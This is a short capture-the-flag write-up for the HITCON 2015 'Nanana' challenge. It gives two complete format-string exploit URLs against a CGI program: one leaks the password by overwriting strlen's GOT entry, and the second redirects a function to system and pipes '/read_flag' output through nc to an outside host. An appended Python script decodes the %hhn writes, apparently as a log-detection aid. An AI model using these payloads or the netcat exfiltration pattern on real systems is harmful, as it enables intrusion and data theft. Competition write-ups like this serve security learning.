HITCON 2015 Quals: Nanana


This challenge was solved by one of my teammates, vek, who also wrote this write-up.

First, we got the correct password by using a format string vulnerability to overwrite the GOT entry of strlen with the address of puts, so that puts(password) got called. We did that with the following input:

http://54.92.88.102/cgi-bin/nanana?action=%2507hhx%2515%24hhn%25057hhx%2517%24hhn%25064hhx%2521%24hhn&username=0%10%60&password=2%10%60&job=1%10%60

With the password (“hitconctf2015givemeshell”), we could trigger a function whose first parameter we controlled, do_job(username), so all we had to do was change do_job’s address to that of system and set username to the desired command, e.g.:

http://54.92.88.102/cgi-bin/nanana?action=%250192hhx%2515%24hhn&username=%2Fread_flag|nc%20X.X.X.X%2025565&password=hitconctf2015givemeshell&job=H%10%6>
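
How the two `action` parameters above decode, as an added example that is not part of the original write-up: this Python sketch URL-decodes the parameter and reports which positional argument each `%hhn` stores to and the byte value stored, which is also a usable check for spotting such requests in CGI access logs. The function names are hypothetical, and the request paths are the page's URLs with the host and the other parameters dropped.

```python
import re
from urllib.parse import urlsplit, parse_qs

# One printf conversion: optional positional argument, flags, width,
# length modifier, conversion character.
DIRECTIVE = re.compile(
    r"%(?:(\d+)\$)?([-+ #0]*)(\d+)?(hh|h|ll|l|j|z|t|L)?([a-zA-Z%])")
WRITE_BITS = {"hh": 8, "h": 16}  # %hhn stores a char, %hn a short

def analyze_format(fmt):
    """Return [(positional_arg, value_stored)] for each %n-family directive."""
    written, pos, writes = 0, 0, []
    for m in DIRECTIVE.finditer(fmt):
        written += m.start() - pos      # literal characters between directives
        pos = m.end()
        arg, _flags, width, length, conv = m.groups()
        if conv == "n":
            bits = WRITE_BITS.get(length)
            value = written % (1 << bits) if bits else written
            writes.append((int(arg) if arg else None, value))
        elif conv == "%":
            written += 1
        else:
            # Assumption: the output is exactly as long as the field width.
            # That holds for %hhx with width >= 2 (at most two hex digits);
            # for other conversions the width is only a lower bound.
            written += int(width or 0)
    return writes

def inspect_request(target, param="action"):
    """Decode one query parameter of a request target and analyze it."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return analyze_format(query.get(param, [""])[0])

# Request targets cut down from the two URLs on this page.
FIRST = ("/cgi-bin/nanana?action=%2507hhx%2515%24hhn"
         "%25057hhx%2517%24hhn%25064hhx%2521%24hhn")
SECOND = "/cgi-bin/nanana?action=%250192hhx%2515%24hhn"

if __name__ == "__main__":
    for target in (FIRST, SECOND):
        for arg, value in inspect_request(target):
            print(f"arg {arg}: stores byte 0x{value:02x}")
```

Any non-empty result from `inspect_request` means the parameter carries a `%n`-family store, which ordinary input to this CGI has no reason to contain.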
